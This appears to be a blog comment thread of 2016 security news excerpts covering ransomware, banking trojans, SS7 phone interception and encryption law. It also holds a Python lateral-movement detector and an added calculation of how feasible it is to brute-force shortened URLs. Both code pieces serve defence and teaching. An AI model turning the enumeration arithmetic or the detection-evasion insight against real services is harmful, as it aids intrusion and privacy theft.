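            by_user[event["user"]].append(event)
    findings = []
    for user, user_events in by_user.items():
        user_events.sort(key=lambda e: e["ts"])
        for i, first in enumerate(user_events):
            hosts = {e["dst"] for e in user_events[i:] if e["ts"] - first["ts"] <= window}
            if len(hosts) >= max_hosts:
                findings.append({"user": user, "first_seen": first["ts"], "hosts": sorted(hosts)})
                break  # one finding per account is enough to raise the alert
    return findings


def detect_peer_logons(events: List[Dict], workstation_prefix: str = "ws-") -> List[Dict]:
    """Workstation-to-workstation logons: users talk to servers, attackers hop between peers."""
    return [
        e for e in events
        if e["result"] == "success"
        and e["src"].startswith(workstation_prefix)
        and e["dst"].startswith(workstation_prefix)
    ]


def run(text: str = SAMPLE_LOG) -> Dict[str, List[Dict]]:
    events = parse_log(text)
    return {"fan_out": detect_fan_out(events), "peer_logons": detect_peer_logons(events)}


if __name__ == "__main__":
    for name, hits in run().items():
        print(name)
        for hit in hits:
            print("  ", hit)
```

Thresholds such as four hosts in ten minutes are a starting point: tune them per account class (a backup or scanning service account legitimately fans out) and tie the alert to the rest of the intrusion picture, since a single hop is also what a helpdesk session looks like.
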
  10. Tomi Engdahl says:

    Threat Modeling
    http://www.omg.org/hot-topics/threat-modeling.htm

    Threats and risks are increasingly multi-dimensional in nature – spanning both physical and cyber space across multiple domains, (i.e. critical infrastructure, cyber, health and human services, public safety).

    There is a critical need to share threat and risk information across these domains. A community of interest (COI) with standards can help spearhead the integration of threat & risk management and situational awareness along with the standards, technologies and capabilities to counter multi-dimensional threats.

    Threat information sharing enables system engineers and architects to build systems-of-systems that implement and leverage the capabilities to share threats (and potentially actual attacks) across different organizations, IT systems and standards. To enable threat sharing across different protocol platforms and systems, a platform-independent model of threats is needed for establishing a common understanding.

    The Object Management Group® (OMG®) System Assurance Task Force in collaboration with the Government Domain Task Force has issued a Request for Proposal (RFP) for a Unified Modeling Language (UML®) Threat & Risk Model.

    Threat and Risk Community
    http://threatrisk.org/drupal/

    Threats and risks are increasingly multi-dimensional in nature – spanning both physical and cyber space. Only by analyzing, federating, and sharing information across multiple domains (i.e. critical infrastructure, cyber, health and human services, public safety), can we effectively counter multi-dimensional threats. This community initiative is focused on driving the federation and secure sharing of threat, risk and provenance information across multiple domains, technologies and data formats. Domains of interest include but are not limited to cybersecurity, law enforcement and public safety, counter terrorism, critical infrastructure, health and emergency management.

  11. Tomi Engdahl says:

    Julia Fioretti / Reuters:
    Microsoft offers first major endorsement of new EU-U.S. data pact — Microsoft (MSFT.O) became on Monday the first major U.S. tech company to say it would transfer users’ information to the United States using a new transatlantic commercial data pact and would resolve any disputes with European privacy watchdogs.

    Microsoft offers first major endorsement of new EU-U.S. data pact
    http://www.reuters.com/article/us-microsoft-dataprotection-eu-idUSKCN0X81IN

    Microsoft (MSFT.O) became on Monday the first major U.S. tech company to say it would transfer users’ information to the United States using a new transatlantic commercial data pact and would resolve any disputes with European privacy watchdogs.

    Data transfers to the United States have been conducted in a legal limbo since October last year when the European Union’s top court struck down the Safe Harbour framework that allowed firms to easily move personal data across the Atlantic in compliance with strict EU data transferral rules.

    EU data protection law bars companies from transferring personal data to countries deemed to have insufficient privacy safeguards, of which the United States is one, unless they set up complex legal structures or use a framework like Safe Harbour.

    Microsoft said it would sign up to the EU-U.S. Privacy Shield, the new framework that was agreed by Brussels and Washington in February to fill the void left by Safe Harbour and ensure the $260 billion in digital services trade across the Atlantic continues smoothly.

  12. Tomi Engdahl says:

    Facebook kills the password, in favor of new login tools in Account Kit
    Soon, developers will be able to see what their users do for a living
    http://www.pcworld.com/article/3055011/application-development/facebook-helps-developers-with-new-analytics-and-login-tools.html

    Facebook is giving developers a host of new tools designed to help them better access and engage users, including improved analytics and new ways to log in to apps.

    One of the biggest new developer tools the company announced at its F8 conference in San Francisco Tuesday was Account Kit, designed to let developers easily create login pages that accept a user’s email address, phone number, or Facebook login. That way, people using a mobile app that’s built with Account Kit can sign up for an account just by punching in their phone number, and authenticating with codes sent to them via text message.

    Facebook does all of the heavy lifting for developers on Account Kit’s back end, so they don’t have to worry about setting up a system to take in phone numbers, Facebook logins, or anything else.

    The company partnered with Indian music streaming app Saavn to test Account Kit, and the app received more than 500,000 sign-ups through just phone numbers over two months.

    Reply
  13. Tomi Engdahl says:

    63 Percent of Healthcare IT Security Professionals Experienced a Data Breach, 96 Percent Feel Vulnerable
    http://www.eetimes.com/prnewswire.asp?rkey=20160413SF70165&filter=4732

    Continued Focus on Compliance Ahead of Data Breach Prevention
    2016 Vormetric Data Threat Report – Healthcare Edition

    Key findings:

    96 percent feel vulnerable to data threats
    63 percent have experienced a past data breach, with nearly one in five indicating a breach in the last year
    At 61 percent, meeting compliance requirements was the top IT security spending priority, with preventing data breaches well behind at 40 percent
    Complexity at 54 percent and lack of staff at 38 percent are identified as top barriers to adoption of better data security
    Bright spots include 60 percent increasing spending to offset threats to data and 46 percent increasing spending on data-at-rest defenses this year

    Healthcare data has become a prime target for cybercriminals. With records selling for hundreds of dollars, it’s no wonder healthcare professionals feel they are in a cybercriminal’s crosshairs. When asked about concerns with external threat actors, 72 percent chose cybercriminals as a top three selection, 39 percent as the number one selection.

    Compliance continues to drive healthcare organizations – But compliance is not enough

    The top three reasons to secure sensitive data were:

    Compliance (61 percent)
    Reputation and brand (49 percent)
    Implementing security best practices (46 percent)

    The problem? 69 percent of U.S. healthcare respondents view meeting compliance requirements as a ‘very’ or ‘extremely’ effective way to protect sensitive data, yet slow moving compliance standards consistently fail to stop today’s multi-phase attacks.

    Reply
  14. Tomi Engdahl says:

    The laptop camera you should cover

    According to Sophos, criminals use RAT (remote access trojan) Trojans to capture computers and spy on their users. They can also turn on the webcam.

    What can a standard user then do? Sophos’ advice is not new, but it should still be followed.

    You should cover your laptop webcam with tape when not in use. The operating system and its applications should be kept up to date at all times, installing security and other updates as they become available. Be careful when opening e-mail links, even if they appear to come from someone familiar.

    Source: http://etn.fi/index.php?option=com_content&view=article&id=4253:taman-takia-lapparin-kamera-kannattaa-peittaa&catid=13&Itemid=101

    Reply
  15. Tomi Engdahl says:

    Jigsaw Ransomware Deletes Your Files If You Don’t Pay Or When You Reboot Your PC
    https://yro.slashdot.org/story/16/04/12/2140221/jigsaw-ransomware-deletes-your-files-if-you-dont-pay-or-when-you-reboot-your-pc

    Researchers found a new ransomware yesterday called Jigsaw which will first lock your files and ask for a 0.4 Bitcoin ($150 USD) payment. If users don’t pay, every hour the ransomware deletes your files. If the user restarts their PC, the ransomware also deletes 1,000 more files. The good news is there’s a free Decrypter available to unlock the ransomware.

    Jigsaw Ransomware Threatens to Delete Your Files, Free Decrypter Available
    http://news.softpedia.com/news/jigsaw-ransomware-threatens-to-delete-your-files-free-decrypter-available-502824.shtml

    A new ransomware variant called Jigsaw has come to light today, and it threatens and then deletes the user’s files if the ransom note is not paid in due time, or when the victim reboots their computer.

    The way this ransomware reaches infected computers is currently unknown. What is known is that once the ransomware’s payload is launched into execution, it will target 226 different file types, encrypting their content with an AES algorithm and appending the .fun extension at the end of each file name.

    Reply
  16. Tomi Engdahl says:

    Cybercriminals Are Adopting Corporate Best Practices
    https://news.slashdot.org/story/16/04/12/1925213/cybercriminals-are-adopting-corporate-best-practices

    Cybercriminals are adopting corporate best practices and establishing professional businesses in order to increase the efficiency of their attacks against enterprises and consumers. This new class of professional cybercriminal spans the entire ecosystem of attackers, extending the reach of enterprise and consumer threats and fueling the growth of online crime. Low-level criminal attackers are even creating call center operations to increase the impact of their scams.

    Cybercriminals are adopting corporate best practices
    https://www.helpnetsecurity.com/2016/04/12/professional-attack-groups/

    Cybercriminals are adopting corporate best practices and establishing professional businesses in order to increase the efficiency of their attacks against enterprises and consumers. This new class of professional cybercriminal spans the entire ecosystem of attackers, extending the reach of enterprise and consumer threats and fueling the growth of online crime.

    Reply
  17. Tomi Engdahl says:

    Security researcher to IBM: ‘Fix that 2013 Java bug’
    And this time, do it right
    http://www.theregister.co.uk/2016/04/13/security_researcher_to_ibm_fix_that_2013_java_bug/

    A security researcher that pointed out serious Java Runtime Engine vulnerabilities to IBM in 2013 has accused Big Blue of not fixing the bugs properly.

    The gist of this Full Disclosure post is that back in 2013, IBM closed off the proof-of-concept attack without considering all possible code paths to the vulnerability.

    The message comes from Adam Gowdiak, who is credited with finding the flaw by IBM in this Security Bulletin.

    Gowdiak’s new work explains that CVE-2013-5456 enabled a Java sandbox bypass.

    IBM’s response at the time was to restrict access to classes from the com.ib.rmi.io package, which closed the scenario disclosed in November 2013.

    Reply
  18. Tomi Engdahl says:

    SQL injection vuln found at Panama Papers firm Mossack Fonseca
    Grey hat hacker continues probing scandal-hit lawyers
    http://www.theregister.co.uk/2016/04/11/hackers_pwn_mossack_fonseca/

    Grey hat security researchers have discovered new flaws in the systems of Panama leak firm Mossack Fonseca.

    A self-styled “underground researcher” claims to have found a SQL injection flaw on one of the corporate systems of the Panamanian lawyers.

    “They updated the new payment CMS, but forgot to lock the directory /onion/,” he said via the “1×0123” Twitter profile.

    “It looks like MF [Mossack Fonseca] had really very low security level, [such] that hackers continue to hack them for fun,” a security intelligence source who notified us of the claimed vulnerability told El Reg.

    Reply
  19. Tomi Engdahl says:

    Microsoft rated 6 of 13 security updates as critical, Badlock bug fix rated important
    http://www.networkworld.com/article/3054645/security/microsoft-rated-6-of-13-security-updates-as-critical-badlock-bug-fix-rated-important.html

    Microsoft released 13 security updates, including patches for zero-days. The patch for the Badlock bug is among those rated only as important.

    For April 2016 Patch Tuesday, Microsoft released 13 security bulletins, with six being rated as critical for remote code execution flaws and the patch for Badlock being among those rated only as important.

    Microsoft Security Bulletin Summary for April 2016
    https://technet.microsoft.com/library/security/ms16-apr

    Reply
  20. Tomi Engdahl says:

    Germany train crash: Controller ‘distracted by computer game’
    http://www.bbc.com/news/world-europe-36025951

    A German train controller has been arrested over the February rail crash that killed 11 people in Bavaria, as prosecutors suspect he was distracted by a computer game at the time.

    According to prosecutors he was playing the computer game on his mobile phone and made a signalling error, then dialled the wrong emergency number.

    He has admitted that version of events, German media report.

    Two commuter trains collided on a single-track stretch near Bad Aibling.

    Eighty-five passengers suffered injuries, some of them life-threatening.

    Investigators quoted by German media said the timings of the computer game and the crash pointed to “the accused having been distracted from his management of rail traffic at the junction”.

    The stretch of line had an automatic signalling system designed to halt any train that passed a stop signal.

    But reports in German media suggested that the system had been switched off to let the eastbound train, which was running late, go past.

    Reply
  21. Tomi Engdahl says:

    Wall Street Journal:
    Twitter struggles to delete ISIS accounts, removing 26K suspected accounts in March while ISIS supporters created 21K

    Twitter and Islamic State Deadlock on Social Media Battlefield
    http://www.wsj.com/article_email/twitter-and-islamic-state-deadlock-on-social-media-battlefield-1460557045-lMyQjAxMTA2NDE0MzAxMzMwWj

    The terror group’s online footprint has shrunk in crackdown aided by global hackers, but supporters open new accounts almost as quickly as digital gatekeepers delete them.

    Reply
  22. Tomi Engdahl says:

    Jeremy B. White / Sacramento Bee:
    California bill banning sale of phones with unbreakable encryption defeated in committee — California phone decryption bill defeated — Bill would penalize companies for not cooperating with law enforcement — Follows federal clash with FBI over San Bernardino shooter’s phone

    California phone decryption bill defeated
    http://www.sacbee.com/news/politics-government/capitol-alert/article71446037.html

    A national debate over smartphone encryption arrived in Sacramento on Tuesday as legislators defeated a bill penalizing companies that don’t work with courts to break into phones, siding with technology industry representatives who called the bill a dangerous affront to privacy.

    The bill did not receive a vote, with members of the Assembly Committee on Privacy and Consumer Protection worrying the measure would undermine data security and impose a logistically untenable requirement on California companies.

    Disagreement over the balance between privacy and public safety exploded into public view in recent months when the FBI demanded that Apple unlock the phone of San Bernardino massacre perpetrator Syed Farook.

    Read more here: http://www.sacbee.com/news/politics-government/capitol-alert/article71446037.html#storylink=cpy

    Reply
  23. Tomi Engdahl says:

    Senate Intel panel releases official encryption bill draft
    http://thehill.com/policy/cybersecurity/276181-senate-intel-panel-releases-official-encryption-bill-draft

    A draft of the long-awaited Senate Intelligence Committee encryption bill officially arrived on Wednesday.

    The measure, from Chairman Richard Burr (R-N.C.) and ranking member Dianne Feinstein (D-Calif.), would force companies to provide “technical assistance” to government investigators seeking locked data.

    The move is a response to concerns that criminals are increasingly using encrypted technology to hide from authorities.

    While law enforcement has long pressed Congress for legislation that would give it greater access to encrypted data, the tech community and privacy advocates warn it would undermine security and endanger online privacy.

    “I have long believed that data is too insecure, and feel strongly that consumers have a right to seek solutions that protect their information — which involves strong encryption,” Burr said in a statement. “I do not believe, however, that those solutions should be above the law.”

    “Terrorists and criminals are increasingly using encryption to foil law enforcement efforts, even in the face of a court order,” Feinstein said in a statement. “We need strong encryption to protect personal data, but we also need to know when terrorists are plotting to kill Americans.”

    The bill does not include specific penalties for companies that refuse to help. Instead, the bill would leave it up to individual judges to decide how to penalize companies

    Reply
  24. Tomi Engdahl says:

    Sarah Jeong / Motherboard:
    Matthew Keys sentenced to 24 months under the Computer Fraud and Abuse Act for his role in 2010 LA Times hack, must surrender to custody June 15, plans appeal — Former Reuters Journalist Matthew Keys Sentenced to Two Years for Hacking — This story has been updated throughout with further information from the sentencing.

    Former Reuters Journalist Matthew Keys Sentenced to Two Years for Hacking
    http://motherboard.vice.com/read/former-reuters-journalist-matthew-keys-sentenced-to-two-years-for-hacking

    On Wednesday, the former Reuters journalist Matthew Keys was sentenced to two years in prison for computer hacking.

    Keys, who once worked for Tribune Company-owned Sacramento television station Fox 40, left that job in 2010 and went on to copy and paste login credentials for the Tribune Company’s content management system (CMS) into a chatroom where members of the hacking collective Anonymous planned out their operations. (Keys still denies all allegations.)

    An unknown person under the username “sharpie” then went on to log into the CMS and deface a Los Angeles Times article. The article’s headline and dek (the subtitle beneath the headline) remained defaced for about forty minutes before an editor noticed and changed it back.

    But the evidence brought at trial with respect to the total loss—and which was likely cited in the sealed presentence report prepared by the probation office—is tied to the Tribune Company’s reaction in the wake of the hack, including an extensive assessment of the entire CMS, as well as emails, phone calls, and meetings made by both journalists and highly-paid executives.

    The story that the prosecution told at trial was not of a one-off, regretful copy/paste into a chatroom, but rather of a weeks-long harassment campaign launched at a former employer

    In sentencing Keys, Judge Mueller said that the effect of the defacement was “relatively modest and did not do much to actually damage the reputation of that publication,” but that she could not ignore that his “intent was to wreak further damage which could have had further consequences.”

    Reply
  25. Tomi Engdahl says:

    BT is recruiting 900 security pros to tackle growing cybercrime threat
    170 graduates and apprentices to be hired as part of recruitment programme
    http://www.theinquirer.net/inquirer/news/2454506/bt-is-recruiting-900-security-pros-to-tackle-growing-cybercrime-threat

    BROADBAND BOTHERER BT is on the hunt for 900 cyber security professionals over the next 12 months in what the firm says is a drive to protect consumers, businesses and governments from the growing threat of cyber crime.

    BT said that it already employs more than 2,500 security professionals but will hire 170 graduates and apprentices as part of the recruitment intake to meet the growing demand for cyber security services.

    The new recruits, which it will hire over the next 12 months, will work across a range of cyber security and related support roles. They will undergo training in BT’s Security Academy in a range of areas, including physical security, penetration testing, threat intelligence, risk management, security operations and sales.

    The majority of the roles will be based in the UK

    “A number of high-profile security and data breaches have dominated the headlines in recent months, and this has led to a surge in interest from consumers and IT departments wanting to know how best they can protect themselves in the digital world,”

    Reply
  26. Tomi Engdahl says:

    Juniper bleeding data and money: slaps Band-Aids all over Junos OS and warns markets
    Security fixes for privilege escalation, DoS, TLS spoofing and more
    http://www.theregister.co.uk/2016/04/14/juniper_drops_a_bunch_of_junos_os_security_fixes/

    Juniper’s code reviewers have been hard at work, and have shipped a bunch of security bug-fixes.

    First up: the company has turned up a bunch of Junos OS privilege escalation vulnerabilities that need patching. As the advisory states, CVE-2016-1271 covers a set of CLI commands that can be exploited to get root access to the affected system.

    As well as patching vulnerable systems, Juniper reminds sysadmins that CLI access should always be restricted to trusted hosts (as well as highly trusted sysadmins).

    The company’s also rolled out a fix to a bunch of bugs in curl and libcurl.

    Reply
  27. Tomi Engdahl says:

    iOS ‘date bug’ can be exploited over Wi-Fi using NTP
    Party like it’s 1970
    http://www.theregister.co.uk/2016/04/14/ios_date_bug_can_be_exploited_over_wifi_using_ntp/

    Back in February, Apple nearly fixed the “1970” date bug that bricked iDevices running 64-bit iOS 8 or higher when their clocks were set to January 1, 1970.

    Apple blushed red and issued a patch, but according to PacketSled’s Matt Harrigan and Critical Assets’ Patrick Kelley, “you missed a spot”: the bug can still be triggered remotely.

    The problem is that the network time protocol (NTP) hasn’t caught up with sensible paranoia, and malicious parties can spoof time server domains.

    As this PacketSled blog post explains, if the iDevice retrieves the bad day’s timestamp from a server spoofing time.apple.com, it bricks.

    It’s a cinch to run up a suitable NTP server: the researchers show how in the YouTube video below, using a Raspberry Pi to make a malicious Wi-Fi hotspot.

    Reply
  28. Tomi Engdahl says:

    Lauri Love backdoor forced-decryption case goes to court in UK
    Why use the ‘gimme password or else’ law when you can evade even that?
    http://www.theregister.co.uk/2016/04/13/lauri_love_compelled_decryption_case/

    Alleged hacktivist Lauri Love appeared in a London court on Tuesday in a case that could establish new powers for UK police to compel criminal suspects into handing over encryption keys.

    Love, 31, faces potential extradition to the US over his alleged involvement in #OpLastResort – the online protests that followed the persecution and untimely death of activist Aaron Swartz.

    US prosecutors want to try Love over alleged attacks against the US Army (Missile Defence Agency), Federal Reserve Bank and the FBI during 2012 and 2013.

    Reply
  29. Tomi Engdahl says:

    Hackers hacking hackers to knacker white hat cracker trackers
    ‘These Russians speak really good Farsi’ and other signs thieves lack honour
    http://www.theregister.co.uk/2016/04/14/there_is_no_honour_among_thieves/

    ACSC2016 Malware writers are selling each other out to white hats and hacking through each other’s infrastructure to frame rivals, Shadowserver’s Richard Perlotto says.

    The treachery is a bid to prompt Shadowserver and fellow malware investigators to take down their rival’s command and control servers and domains.

    Perlotto says they are happy to oblige.

    “We are seeing A-level actors hacking through B-level and C-level actors, sometimes through two or three of em,” Perlotto told the Australian Cyber Security Conference in Canberra today.

    “The criminals are pointing each other to us saying ‘hey this arsehole’s over here, take him out’ and we do.”

    “They will dox each other too and we benefit from that.”

    Reply
  30. Tomi Engdahl says:

    Burr-Feinstein Anti-Encryption Bill Is Officially Released
    https://yro.slashdot.org/story/16/04/14/0351212/burr-feinstein-anti-encryption-bill-is-officially-released

    Senators Richard Burr and Dianne Feinstein released the official version of their anti-encryption bill today after a draft appeared online last week. The bill, titled the Compliance with Court Orders Act 2016, would require tech firms to decrypt customers’ data at a court’s request. The bill is not expected to get anywhere in the Senate. President Obama has also indicated that he will not support the bill, Reuters reports. The bill requires communications services to backdoor their encryption in order to provide “intelligible information or data, or appropriate technical assistance to obtain such information or data.” Sen. Feinstein stated

    Reply
  31. Tomi Engdahl says:

    The EU is trying to bridle the NSA’s data collection

    Between the European Union member states and the US, a new page is being turned with the Privacy Shield agreement, which would define the rules on data transfer and control across the Atlantic. The Commission has received a lot of corrections to the original text of the agreement from the Member States, but it is still trying to get the agreement into force within a few months.

    The whole project was inspired by Edward Snowden’s revelations about the US virtual security authority, i.e. the NSA’s practice that anyone other than Americans can be monitored by means of mass phishing. In practice, the NSA can capture, analyze, and monitor all European data traffic.

    With the new Privacy Shield Agreement, the European Commission wants to definitely get rid of such mass spying.

    From the European point of view the main problem is the NSA. It is not properly controlled by anyone.

    The work on the agreement is important not only for citizens but also for businesses. Online business and commerce knows no boundaries.

    Source: http://etn.fi/index.php?option=com_content&view=article&id=4258:eu-yrittaa-suitsia-nsa-n-datankeruuta&catid=13&Itemid=101

    Reply
  32. Tomi Engdahl says:

    Nick Statt / The Verge:
    Obama appoints former NSA director Keith Alexander, Uber CSO, MasterCard CEO, and Corporate VP of Microsoft Research to cybersecurity panel

    Obama appoints execs from MasterCard, Uber, and Microsoft to cybersecurity panel
    As well as former NSA director Keith Alexander
    http://www.theverge.com/2016/4/13/11427182/president-obama-cybersecurity-panel-uber-microsoft-mastercard-nsa

    The White House today released a list of names President Barack Obama will appoint to his new Commission on Enhancing National Cybersecurity. The panel, established this year as part of Obama’s $19 billion proposal to tighten defenses against hacking threats, seeks to tap industry experts outside the government for cybersecurity recommendations for both the public and private sectors.

    The entire budget proposal, totaling $4 trillion, is for the 2017 fiscal year starting October 1st. The Obama Administration has said in the past that the $19 billion for cybersecurity, a 35 percent bump in spending, should garner bipartisan support considering it was prompted in part by a massive breach of the government’s personnel office last year.

    Reply
  33. Tomi Engdahl says:

    CIA Is Investing Heavily In Firms That Do Social Media Mining and Surveillance
    https://yro.slashdot.org/story/16/04/15/1344219/cia-is-investing-heavily-in-firms-that-do-social-media-mining-and-surveillance?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29

    Lee Fang, reporting for The Intercept, lists more than three dozen companies that have received funding from the CIA. In-Q-Tel, the CIA’s venture capital firm, the publication claims, has invested in 38 companies that research “social media mining and surveillance.”

    The CIA Is Investing in Firms That Mine Your Tweets and Instagram Photos
    https://theintercept.com/2016/04/14/in-undisclosed-cia-investments-social-media-mining-looms-large/

    Reply
  34. Tomi Engdahl says:

    Whistleblowers Fear Prosecution Under New European Trade Secrets Law
    https://yro.slashdot.org/story/16/04/14/205204/whistleblowers-fear-prosecution-under-new-european-trade-secrets-law

    The European Parliament is debating the Trade Secrets Protection Act critics say threatens to turn whistleblowers into criminals. The bill is aimed to protect European companies from corporate spying by their rivals in other parts of the world. But critics fear that the legislation will make it possible for corporations to define any information they do not want released as a trade secret, and then prosecute journalists or whistleblowers who release it to the public.

    Whistleblowers fear prosecution under new European Trade Secrets law
    http://www.bbc.com/news/business-36041738

    The European Parliament is debating a bill on Thursday critics say threatens to turn whistleblowers into criminals.

    The aim of the Trade Secrets Protection Act is to protect European companies from corporate spying by their rivals in other parts of the world.

    But critics say journalists and whistleblowers could be criminalised if they publish information that companies deem to be secret.

    More than half a million people have signed a petition against the bill.

    Industrial espionage is a major worry in the corporate world, and other countries have already put laws in place to protect their companies.

    Offenders in the US can be jailed for up to fifteen years, and a quarter of prosecutions involved people connected with China.

    According to the European Commission, one in five companies in Europe suffered an attempt to steal trade secrets in the last 10 years.

    Fears

    But opponents of the plans in Europe say the bill is not specific enough about the type of information it is trying to protect.

    They fear that the legislation will make it possible for corporations to define any information they do not want released as a trade secret, and then prosecute journalists or whistleblowers who release it to the public.

    Misinterpretation

    The bill’s supporters say there is nothing to worry about because it contains a defence for those who release information exposing criminal wrongdoing or who are acting in the public interest.

    But not everything exposed by the Panama papers was illegal – much of it was merely embarrassing to the people who were named.

    Reply
  35. Tomi Engdahl says:

    Swiss banker whistleblower: CIA behind Panama Papers

    Bradley Birkenfeld is the most significant financial whistleblower of all time, so you might think he’d be cheering on the disclosures in the new Panama Papers leaks. But today, Birkenfeld is raising questions about the source of the information that is shaking political regimes around the world.

    In an exclusive interview Tuesday from Munich, Birkenfeld said he doesn’t think the source of the 11 million documents stolen from a Panamanian law firm should automatically be considered a whistleblower like himself. Instead, he said, the hacking of the Panama City-based firm, called Mossack Fonseca, could have been done by a U.S. intelligence agency.

    “The CIA I’m sure is behind this, in my opinion,” Birkenfeld said.

    Birkenfeld pointed to the fact that the political uproar created by the disclosures have mainly impacted countries with tense relationships with the United States.

    Sources:
    http://www.tivi.fi/rss/arvio-he-ovat-panaman-tietovuodon-takana-6541491
    http://www.cnbc.com/2016/04/12/swiss-banker-whistleblower-cia-behind-panama-papers.html

    Reply
  36. Tomi Engdahl says:

    Ensuring network cyber security
    http://www.controleng.com/single-article/ensuring-network-cyber-security/795ff533f8c4d3713399e2e49a5f8197.html

    Good cyber security requires understanding network risks, threats, and the technical safeguards that can prevent unwanted plant data intrusions.

    “What’s the worst that could happen?” This question is at the heart of many plantwide discussions. Deliberations on safety interlocks, alarm rationalization, hazard analyses, job safety plans, and process equipment design routinely center on this premise. Why, then, do some facilities have a lackadaisical approach to the layout and protection of their network security?

    At risk

    Some plants do well from a cyber security standpoint. Other sites have used such stringent security measures as the cryptic “text Billy for the wireless password” method. Seriously. Different plants run the gamut, from requiring a Transportation Worker Identification Credential card upon entry to requiring the driver of a vehicle to roll down the window and shout a number to the guard that supposedly corresponds to a vehicle pass list somewhere. Where does your plant fall in this spectrum? Is your network password written on a whiteboard in the control room or emailed in halves to two trusted supervisors?

    Before discussing strategies to isolate and protect plant networks, consider the most common cyber attacks and the simplest guards against them.

    Reply
  37. Tomi Engdahl says:

    Thomas Fox-Brewster / Forbes:
    Researchers uncover GozNym, a malware that is a hybrid of Nymaim and Gozi that has stolen $4M from customers of 24 US and Canadian banks in just 3 days

    Eastern European Cyber Crooks Raid US Banks For $4 Million In Just 3 Days
    http://www.forbes.com/sites/thomasbrewster/2016/04/14/goznym-bank-malware-steals-4-million-american-banks/#39cb157d493d

    In early April, cybercriminals believed to be of Eastern European origin unleashed a malware that stole $4 million from more than 24 American and Canadian banks in just a few days, security researchers at IBM said today. The hackers combined code from two malware types, known as Nymaim and Gozi, to create GozNym, a Trojan both persistent and powerful

    a variant of Gozi, the source code of which leaked in 2010

    Gozi, another version of which called Gozi ISFB was leaked towards the end of 2015, was designed to inject scripts into browsers so that when a victim visited their banking site, logins would be hoovered up.

    Another source with knowledge of the malware, who asked to remain anonymous, said GozNym was also active in Asia and Europe but appeared to target American banks with overseas operations.

    Reply
  38. Tomi Engdahl says:

    Andy Greenberg / Wired:
    Researchers detail how they brute forced shortened URLs from OneDrive and Google Maps to access private information; Microsoft and Google respond — Researchers Crack Microsoft and Google’s Shortened URLs to Spy on People — For anyone with minimalist tastes or an inability …

    Researchers Crack Microsoft and Google’s Shortened URLs to Spy on People
    http://www.wired.com/2016/04/researchers-cracked-microsoft-googles-shortened-urls-spy-people/

    For anyone with minimalist tastes or an inability to use copy-paste keyboard shortcuts, URL shorteners may seem like a perfectly helpful convenience. Unfortunately, the same tools that turn long web addresses into a few characters also offer the same conveniences to hackers—including any of them motivated enough to try millions of shortened URLs until they hit on the one you thought was private.

    That’s the lesson for companies including Google, Microsoft, and Bit.ly in a paper published today by researchers at Cornell Tech. The researchers’ work demonstrates the unexpected privacy-invasive potential of “brute-forcing” shortened URLs: By guessing at shortened URLs until they found working ones, the researchers say that they could have pulled off tricks ranging from spreading malware on unwitting victims’ computers via Microsoft’s cloud storage service to finding out who requested Google Maps directions to abortion providers or drug addiction treatment facilities.

Reply
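As an added example, not from the Wired article or the Cornell paper: a small Python sizing calculation for a shortener's token space, showing why a five- or six-character token is enumerable at modest request rates and how long a token has to be before a random guess almost never lands on a live link. Alphabet size, token lengths, the number of live links and the request rate are all assumptions.

```python
import math

# Constructed sizing analysis, added here to illustrate the brute-force risk
# the article describes. The alphabet size, token lengths, live-link counts
# and request rates below are assumptions, not figures from the paper or
# from any particular shortener.

BASE62 = 62           # [A-Za-z0-9], a common shortener alphabet (assumption)
SECONDS_PER_DAY = 86_400


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct tokens of exactly `length` characters."""
    return alphabet_size ** length


def hit_probability(alphabet_size: int, length: int, live_urls: int) -> float:
    """Chance that one uniformly random token resolves to a live link."""
    return min(1.0, live_urls / keyspace(alphabet_size, length))


def expected_guesses_per_hit(alphabet_size: int, length: int, live_urls: int) -> float:
    """Mean number of guesses an enumerator needs per live link found."""
    p = hit_probability(alphabet_size, length, live_urls)
    return math.inf if p == 0.0 else 1.0 / p


def days_to_exhaust(alphabet_size: int, length: int, requests_per_second: float) -> float:
    """Days needed to try every token at a sustained request rate."""
    return keyspace(alphabet_size, length) / requests_per_second / SECONDS_PER_DAY


def min_token_length(alphabet_size: int, live_urls: int, max_hit_probability: float) -> int:
    """Smallest token length that keeps the per-guess hit chance at or below the target."""
    length = 1
    while hit_probability(alphabet_size, length, live_urls) > max_hit_probability:
        length += 1
    return length


if __name__ == "__main__":
    live = 10_000_000      # assumed number of live short links
    rate = 1_000.0         # assumed sustained guesses per second (unthrottled)
    for length in (5, 6, 8, 10):
        print(f"base62 length {length}: {keyspace(BASE62, length):.3e} tokens, "
              f"{expected_guesses_per_hit(BASE62, length, live):.1f} guesses per hit, "
              f"{days_to_exhaust(BASE62, length, rate):.1f} days to exhaust")
    print("length needed for a <= 1e-9 per-guess hit chance:",
          min_token_length(BASE62, live, 1e-9))
```

The defender's lever is the pair of numbers the functions expose: either the token is long enough that guesses almost never hit, or the request rate is throttled so that exhausting the space takes longer than the data stays sensitive.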
  39. Tomi Engdahl says:

    Sharyn Alfonsi / CBS News:
    On 60 Minutes, security expert Karsten Nohl eavesdrops on cellphone calls and texts knowing just the phone’s number by hacking SS7, a global carrier protocol

    Hacking Your Phone
    Sharyn Alfonsi reports on how cellphones and mobile phone networks are vulnerable to hacking
    http://www.cbsnews.com/news/60-minutes-hacking-your-phone/

    A lot of modern life is interconnected through the Internet of things — a global empire of billions of devices and machines. Automobile navigation systems. Smart TVs. Thermostats. Telephone networks. Home security systems. Online banking. Almost everything you can imagine is linked to the world wide web. And the emperor of it all is the smartphone. You’ve probably been warned to be careful about what you say and do on your phone, but after you see what we found, you won’t need to be warned again.

    We heard we could find some of the world’s best hackers in Germany.

    Karsten Nohl: What hacking story?

    They were able to do it by exploiting a security flaw they discovered in Signaling System Seven — or SS7. It is a little-known, but vital global network that connects phone carriers.

    Sharyn Alfonsi: Congressman thank you so much for helping us…

    Every person with a cellphone needs SS7 to call or text each other. Though most of us have never heard of it.

    Nohl says attacks on cellphones are growing as the number of mobile devices explodes. But SS7 is not the way most hackers break into your phone–

    Those hacks are on display in Las Vegas.

    John Hering: It’s proving what’s possible. Any system can be broken it’s just knowing how to break it.

    John Hering: I think that most people have not really thought about their phones as computers. And that that’s really starting to shift.

    All Karsten Nohl’s team in Berlin needed to get into the congressman’s phone was the number. Remember SS7 – that little-known global phone network we told you about earlier?

    Karsten Nohl: I’ve been tracking the congressman.

    There’s a flaw in it that allowed Nohl to intercept and record the congressman’s calls and track his movements in Washington and back home.

